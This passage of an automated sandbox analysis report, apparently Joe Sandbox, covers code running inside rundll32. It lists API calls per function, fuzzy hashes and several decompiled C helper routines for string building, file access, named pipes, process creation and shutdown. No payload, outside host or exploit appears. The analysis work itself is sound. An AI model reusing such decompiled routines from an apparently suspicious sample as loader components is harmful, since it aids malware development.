                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1929783139-0
                                                          • Opcode ID: b3b19a604ac7a1380d6d9fabcf817a202aeabfe86d44fff3d1b3896b6392211e
                                                          • Instruction ID: 846fce048e1da2859b21a95b1d2796fbede4f933307bff1d9e32b5a0ac0aad66
                                                          • Opcode Fuzzy Hash: b3b19a604ac7a1380d6d9fabcf817a202aeabfe86d44fff3d1b3896b6392211e
                                                          • Instruction Fuzzy Hash: B901C876604348FFC7119FAAA889E5E7FBCBB48600F110165F90AD3241DB34950CDB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 0557B35F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0557B385
                                                          • lstrcpy.KERNEL32(00000014,?), ref: 0557B3AA
                                                          • memcpy.NTDLL(?,?,?), ref: 0557B3B7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1388643974-0
                                                          • Opcode ID: 9c004b84e7aa51bbe3510dd334c952d61b1df42ee8c9f544de769d996934f777
                                                          • Instruction ID: 587797137877d4b4047823a20f93278c9e9e5e0880c4e35a597266710a874353
                                                          • Opcode Fuzzy Hash: 9c004b84e7aa51bbe3510dd334c952d61b1df42ee8c9f544de769d996934f777
                                                          • Instruction Fuzzy Hash: E611767150030AEFCB20CF58E884A9ABBF8FB48314F01852AF84A87210DB74E908DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,7748D3B0,00000000,00000000,05575F7D,00000000,?,?,?,?,?,05572A10,00000000,00000000), ref: 05590CAD
                                                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05590CC5
                                                          • memcpy.NTDLL(0000000C,?,00000001,?,?,?,?,?,05572A10,00000000,00000000), ref: 05590CDB
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,7748D3B0,059BB17C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D043
                                                            • Part of subcall function 0557D01E: StrTrimA.SHLWAPI(00000000,0559847C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D062
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D06E
                                                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,05572A10,00000000,00000000), ref: 05590D0D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3208927540-0
                                                          • Opcode ID: c253547e12002a84381341d4b6aad295fbc5b03a0db9b675094b916221cc56a2
                                                          • Instruction ID: 1625e3104e333989a895dbd9ed4d717c8612f4d133bfe21d7a687b485e27e1fa
                                                          • Opcode Fuzzy Hash: c253547e12002a84381341d4b6aad295fbc5b03a0db9b675094b916221cc56a2
                                                          • Instruction Fuzzy Hash: 7101F735214306ABE7255A12ED8DF2B7FA9FBC0760F114826F60A950D0DF68B80D9B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • RtlInitializeCriticalSection.NTDLL(0559C300), ref: 0558AA79
                                                          • RtlInitializeCriticalSection.NTDLL(0559C2E0), ref: 0558AA8F
                                                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558AAA0
                                                          • GetModuleHandleA.KERNEL32(0000170B), ref: 0558AAD4
                                                            • Part of subcall function 0557F99E: GetModuleHandleA.KERNEL32(?), ref: 0557F9B6
                                                            • Part of subcall function 0557F99E: LoadLibraryA.KERNEL32(?), ref: 0557FA57
                                                            • Part of subcall function 0557F99E: FreeLibrary.KERNEL32(00000000), ref: 0557FA62
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                          • String ID:
                                                          • API String ID: 1711133254-0
                                                          • Opcode ID: 64516469fdc3e63e357fa336c47e03e5e0784fa8e4667cf1c1783b0f3ba7cf63
                                                          • Instruction ID: 5946d441f6f02e77ef8390134cbcbf5d21f3a35ec23ab36b3d68dec2d1fca81b
                                                          • Opcode Fuzzy Hash: 64516469fdc3e63e357fa336c47e03e5e0784fa8e4667cf1c1783b0f3ba7cf63
                                                          • Instruction Fuzzy Hash: DC116171A602009BDB10EFE9E886915BFE4F749311742056BF145E3600DFBC4C4CBB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 055803F0
                                                          • Sleep.KERNEL32(0000000A,?,?,?,0557CC1E,00000000,?,00000029,0559C140,055747B2,?), ref: 055803FA
                                                          • SetEvent.KERNEL32(?,?,?,0557CC1E,00000000,?,00000029,0559C140,055747B2,?), ref: 05580451
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05580470
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterEventLeaveSleep
                                                          • String ID:
                                                          • API String ID: 1925615494-0
                                                          • Opcode ID: bad84240abd85496cc1f5612b21b69beb15f73428f39fe24cb54832a716cd129
                                                          • Instruction ID: 8045862d3d604686e6b3c076e096797e58caa401395db17f9ef4a259f99f8154
                                                          • Opcode Fuzzy Hash: bad84240abd85496cc1f5612b21b69beb15f73428f39fe24cb54832a716cd129
                                                          • Instruction Fuzzy Hash: 50015271694304EBEB10ABA4EC8AF6A3FA8FB04751F514016F605E61E0DB78990CDA51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558EA1C: lstrlen.KERNEL32(?,?,00000000,0557D714), ref: 0558EA21
                                                            • Part of subcall function 0558EA1C: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0558EA36
                                                            • Part of subcall function 0558EA1C: wsprintfA.USER32 ref: 0558EA52
                                                            • Part of subcall function 0558EA1C: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0558EA6E
                                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0557D72C
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0557D73B
                                                          • CloseHandle.KERNEL32(00000000), ref: 0557D745
                                                          • GetLastError.KERNEL32 ref: 0557D74D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4042893638-0
                                                          • Opcode ID: 855e2465a5307977aafd945e09d0cd244b6ed50ec2d89132ab8eb4fd19d6378f
                                                          • Instruction ID: 9b597497da96e6773270a16841b0d89f41cccd945a1ef5347efdfc37a921c424
                                                          • Opcode Fuzzy Hash: 855e2465a5307977aafd945e09d0cd244b6ed50ec2d89132ab8eb4fd19d6378f
                                                          • Instruction Fuzzy Hash: C9F08131205218BAD7216F65ECCEF9F7E6CFF41AA1F104516F50AA6080DA35954896F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E00E53D0E(intOrPtr _a4, intOrPtr _a8) {
                                                          				char _v20;
                                                          				void* _t8;
                                                          				void* _t13;
                                                          				void* _t16;
                                                          				char* _t18;
                                                          				void* _t19;
                                                          
                                                          				_t19 = 0x27;                                  // 0x00e53d19
                                                          				_t18 = 0;                                     // 0x00e53d1d
                                                          				E00E559CB(_t8,  &_v20);                       // 0x00e53d1f
                                                          				_t16 = E00E55FBC(_t19);                       // 0x00e53d2a  subcall 00E55FBC: RtlAllocateHeap (see APIs below)
                                                          				if(_t16 != 0) {                               // 0x00e53d2e
                                                          					_t13 = E00E54073( &_v20, _t16, _a8);  // 0x00e53d37  subcall 00E54073: wsprintfA into the new buffer
                                                          					if(_a4 != 0) {                        // 0x00e53d3f
                                                          						__imp__(_a4);                 // 0x00e53d44  lstrlen(_a4), ref 00E53D44
                                                          						_t19 = _t13 + 0x27;           // 0x00e53d4c  size for the second allocation
                                                          					}                                     // 0x00e53d4c
                                                          					_t18 = E00E55FBC(_t19);               // 0x00e53d55  second heap allocation
                                                          					if(_t18 != 0) {                       // 0x00e53d59
                                                          						 *_t18 = 0;                   // 0x00e53d5f  start with an empty string
                                                          						if(_a4 != 0) {                // 0x00e53d62
                                                          							__imp__(_t18, _a4);   // 0x00e53d68  lstrcpy(_t18, _a4), ref 00E53D68
                                                          						}                             // 0x00e53d68
                                                          						__imp__(_t18, _t16);          // 0x00e53d70  lstrcat(_t18, _t16), ref 00E53D70
                                                          					}                                     // 0x00e53d70
                                                          					E00E513CC(_t16);                      // 0x00e53d77
                                                          				}                                             // 0x00e53d77
                                                          				return _t18;                                  // 0x00e53d82
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                            • Part of subcall function 00E54073: wsprintfA.USER32 ref: 00E540CF
                                                          • lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,051B9CD0,74ECC740,KE,?,69B25F44,E8FA7DD7,00000000,?,?,?,00E5454B), ref: 00E53D44
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00E53D68
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E53D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                          • String ID: KE
                                                          • API String ID: 393707159-838392977
                                                          • Opcode ID: 08e8347fb45017c6adf46bfb33cc38ddbd081b36afa1d87cfeddc09688cab0d1
                                                          • Instruction ID: 070557102039c42f515f31e6ae4fcfdb2f4e3acee7d23ae69f9e961a5b48bfea
                                                          • Opcode Fuzzy Hash: 08e8347fb45017c6adf46bfb33cc38ddbd081b36afa1d87cfeddc09688cab0d1
                                                          • Instruction Fuzzy Hash: A701A732100605ABC7112B758C84AEF7BBD9F8475BF045C24FE1476156D7748A4DC7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 05585ED0
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                            • Part of subcall function 0558C45A: GetLastError.KERNEL32 ref: 0558C4A5
                                                            • Part of subcall function 0558C45A: WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                            • Part of subcall function 0558C45A: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                            • Part of subcall function 0558C45A: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                            • Part of subcall function 0558C45A: SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                            • Part of subcall function 0558C45A: CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,05577D5B,?,?,00001000,?,?,00001000), ref: 05585EF3
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,05577D5B,?,?,00001000,?,?,00001000), ref: 05585F15
                                                          • GetLastError.KERNEL32(?,05577D5B,?,?,00001000,?,?,00001000), ref: 05585F29
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                          • String ID:
                                                          • API String ID: 3370347312-0
                                                          • Opcode ID: 30fec345845fd9d86305b6f8d3286b1c0d831000d61a5e25cb3d737c9d9f4b36
                                                          • Instruction ID: ff5261f69ab6a69902c76ff4305bf228c76854ab2324abdb43b8f4b9bf127127
                                                          • Opcode Fuzzy Hash: 30fec345845fd9d86305b6f8d3286b1c0d831000d61a5e25cb3d737c9d9f4b36
                                                          • Instruction Fuzzy Hash: DAF0A431214205BBEF116F60EC0AFBA3E26BF05711F110015F702E90D0EB759569EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedExchange.KERNEL32(0559C000,00000000), ref: 05583B64
                                                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05583B7F
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05583BA8
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05583BC9
                                                            • Part of subcall function 0557BDFA: SetEvent.KERNEL32(?,7519F560,05590797,?,?,0558BCB5), ref: 0557BE0F
                                                            • Part of subcall function 0557BDFA: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 0557BE2F
                                                            • Part of subcall function 0557BDFA: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE38
                                                            • Part of subcall function 0557BDFA: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE42
                                                            • Part of subcall function 0557BDFA: RtlEnterCriticalSection.NTDLL(00000008), ref: 0557BE4A
                                                            • Part of subcall function 0557BDFA: RtlLeaveCriticalSection.NTDLL(00000008), ref: 0557BE62
                                                            • Part of subcall function 0557BDFA: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE7E
                                                            • Part of subcall function 0557BDFA: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE89
                                                            • Part of subcall function 0557BDFA: RtlDeleteCriticalSection.NTDLL(00000008), ref: 0557BE93
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                          • String ID:
                                                          • API String ID: 1103286547-0
                                                          • Opcode ID: 1fe1f5a3498769e13af5cadf6fe99fa0ece3040f12dcbca59dc4e29dac8556cb
                                                          • Instruction ID: fa2a6ae0ac8b7261676518a85802d1b155f04f8d77c087adab1ee2c721f1a325
                                                          • Opcode Fuzzy Hash: 1fe1f5a3498769e13af5cadf6fe99fa0ece3040f12dcbca59dc4e29dac8556cb
                                                          • Instruction Fuzzy Hash: DBF06831754311B7D6306766EC4FF5A3F24FB85B61F070416B605A6190DE6DA80DEB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,055797FF,000000FF,059BA7F0,?,?,0557841E,0000003A,059BA7F0), ref: 055779A7
                                                          • GetLastError.KERNEL32(?,?,0557841E,0000003A,059BA7F0,?,?,?,05581876,00000001,00000000,059BB184), ref: 055779B2
                                                          • WaitNamedPipeA.KERNEL32(00002710), ref: 055779D4
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,0557841E,0000003A,059BA7F0,?,?,?,05581876,00000001,00000000,059BB184), ref: 055779E2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                          • String ID:
                                                          • API String ID: 4211439915-0
                                                          • Opcode ID: dda6e0d9268dab07f5bc39612f81de9f7161970802613a2c9d8a40189eaea9ec
                                                          • Instruction ID: 9b472e7a298459716d3905a2bd8e87d2b1b261dced83fd62e062accbfc8f9b22
                                                          • Opcode Fuzzy Hash: dda6e0d9268dab07f5bc39612f81de9f7161970802613a2c9d8a40189eaea9ec
                                                          • Instruction Fuzzy Hash: ABF09632626121ABDB305665FC4EF567F55FB05371F124622F91AE61A0CA251C48EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,0557D714), ref: 0558EA21
                                                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0558EA36
                                                          • wsprintfA.USER32 ref: 0558EA52
                                                            • Part of subcall function 05586CA6: memset.NTDLL ref: 05586CBB
                                                            • Part of subcall function 05586CA6: lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000020,00000000), ref: 05586CF4
                                                            • Part of subcall function 05586CA6: wcstombs.NTDLL ref: 05586CFE
                                                            • Part of subcall function 05586CA6: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000020,00000000), ref: 05586D2F
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D5B
                                                            • Part of subcall function 05586CA6: TerminateProcess.KERNEL32(?,000003E5), ref: 05586D71
                                                            • Part of subcall function 05586CA6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D85
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DB8
                                                            • Part of subcall function 05586CA6: CloseHandle.KERNEL32(?), ref: 05586DBD
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0558EA6E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                          • String ID:
                                                          • API String ID: 1624158581-0
                                                          • Opcode ID: 28a97bc652d4a66a8ebcacd45ab8bf9b6b36fa7480dfcbdc2599e613d80da51e
                                                          • Instruction ID: 4e44ddd4551cb81b81c05c85deeb5771021758621c04a9b2607929409aba493e
                                                          • Opcode Fuzzy Hash: 28a97bc652d4a66a8ebcacd45ab8bf9b6b36fa7480dfcbdc2599e613d80da51e
                                                          • Instruction Fuzzy Hash: 60F0B432614111BBD621672ABD0FF6B3E7DFBC2B70F070112F501E6190DE289C099AA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 0557718D
                                                          • Sleep.KERNEL32(0000000A,?,?,?,?,?,05572A10,00000000,00000000), ref: 05577197
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,05572A10,00000000,00000000), ref: 055771BF
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 055771DD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 369273442d23e1840b045afae02299e8318a95a909a6056916e57158cdbab3a1
                                                          • Instruction ID: d84b5b79b6cd7f0a69b37183ac0af6446e6ad8730a18757fbcc51dcb344134eb
                                                          • Opcode Fuzzy Hash: 369273442d23e1840b045afae02299e8318a95a909a6056916e57158cdbab3a1
                                                          • Instruction Fuzzy Hash: 17F03A302242809BEB208BA5FC8EF1A7FA4FB04380F164406F446DB191CA28E81CEB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E5566B() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;

                                                          				// Shutdown helper: signals the global event, waits (in 100 ms slices) until the
                                                          				// global flag at 0xe5a308 is cleared or the wait budget runs out, then releases
                                                          				// the event handle and destroys the private heap.
                                                          				_t1 =  *0xe5a2c4; // 0x2ec (global event handle)
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff; // remaining wait budget in milliseconds
                                                          				while(1) {
                                                          					SleepEx(0x64, 1); // alertable 100 ms sleep
                                                          					_t5 =  *0xe5a308; // 0x0 (polled until it reads zero)
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break; // wait budget exhausted
                                                          				}
                                                          				_t6 =  *0xe5a2c4; // 0x2ec
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0xe5a290; // 0x4dc0000 (private heap handle)
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}

                                                          Statement addresses (listing side column, 0x00000000 = no address for that line): 0x00e5566b, 0x00e55672, 0x00e556bc, 0x00e556be, 0x00e556be, 0x00e55676, 0x00e5567c, 0x00e55681, 0x00e55685, 0x00e5568b, 0x00e55692, 0x00000000, 0x00000000, 0x00e55694, 0x00e55699, 0x00000000, 0x00000000, 0x00000000, 0x00e55699, 0x00e5569b, 0x00e556a3, 0x00e556a6, 0x00e556a6, 0x00e556ac, 0x00e556b3, 0x00e556b6, 0x00e556b6, 0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002EC,00000001,00E56991), ref: 00E55676
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 00E55685
                                                          • CloseHandle.KERNEL32(000002EC), ref: 00E556A6
                                                          • HeapDestroy.KERNEL32(04DC0000), ref: 00E556B6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 1bf642d34ceff8af801215dc7450d422599a59aa5fdedbe108c0335c2361ceba
                                                          • Instruction ID: 2cd824d6fd0777d7e3d2a8e253e7ce7b1467d60fdd9bb5f73c91169fb791eff3
                                                          • Opcode Fuzzy Hash: 1bf642d34ceff8af801215dc7450d422599a59aa5fdedbe108c0335c2361ceba
                                                          • Instruction Fuzzy Hash: 3EF08C72B01751DFEA246B36DC28B8B3BA8AB04B23B080E20BD04F31E2DB64CC0C8551
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E00E54013(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr* _t1;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t10;
                                                          				void* _t11;
                                                          				void** _t13;

                                                          				// Replaces the buffer referenced by __esi under the critical section that lives at
                                                          				// offset 0x40 of the global context at 0xe5a37c. The unresolved __imp__ calls are
                                                          				// RtlEnterCriticalSection / RtlLeaveCriticalSection (see the APIs list below).
                                                          				_t13 = __esi;
                                                          				_t4 =  *0xe5a37c; // 0x51b9630
                                                          				__imp__(_t4 + 0x40); // RtlEnterCriticalSection
                                                          				while(1) {
                                                          					// spin while the busy flag at offset 0x58 of the context is set
                                                          					_t6 =  *0xe5a37c; // 0x51b9630
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t13;
                                                          				// free the old buffer unless it is the static default at 0xe5a030
                                                          				if(_t8 != 0 && _t8 != 0xe5a030) {
                                                          					HeapFree( *0xe5a290, 0, _t8);
                                                          				}
                                                          				_t13[1] = E00E538DA(_v0, _t13);
                                                          				_t10 =  *0xe5a37c; // 0x51b9630
                                                          				_t11 = _t10 + 0x40;
                                                          				__imp__(_t11); // RtlLeaveCriticalSection
                                                          				return _t11;
                                                          			}

                                                          Statement addresses (listing side column, 0x00000000 = no address for that line): 0x00e54013, 0x00e54013, 0x00e5401c, 0x00e5402c, 0x00e5402c, 0x00e54031, 0x00e54036, 0x00000000, 0x00000000, 0x00e54026, 0x00e54026, 0x00e54038, 0x00e5403c, 0x00e5404e, 0x00e5404e, 0x00e5405e, 0x00e54061, 0x00e54066, 0x00e5406a, 0x00e54070

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E5401C
                                                          • Sleep.KERNEL32(0000000A,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E54026
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00E54540,?,?,?,?,?,00E568F7,?,00000001), ref: 00E5404E
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E5406A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 5b32884015135a832a4364ce47658854f4fc1d4032ac68b171fc5a6ff8d4ce48
                                                          • Instruction ID: f18bd62d2296bb7fa15a1c24c4f484863f99ea65e1ca91be4b0cee22b4144c57
                                                          • Opcode Fuzzy Hash: 5b32884015135a832a4364ce47658854f4fc1d4032ac68b171fc5a6ff8d4ce48
                                                          • Instruction Fuzzy Hash: 86F05470204340DFDB289B36DC49B963BA4EB0434BB185C10FA55F61F1C220D84CD712
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05574C24
                                                          • Sleep.KERNEL32(0000000A,?,?,?,?,?,05572A10,00000000,00000000), ref: 05574C2E
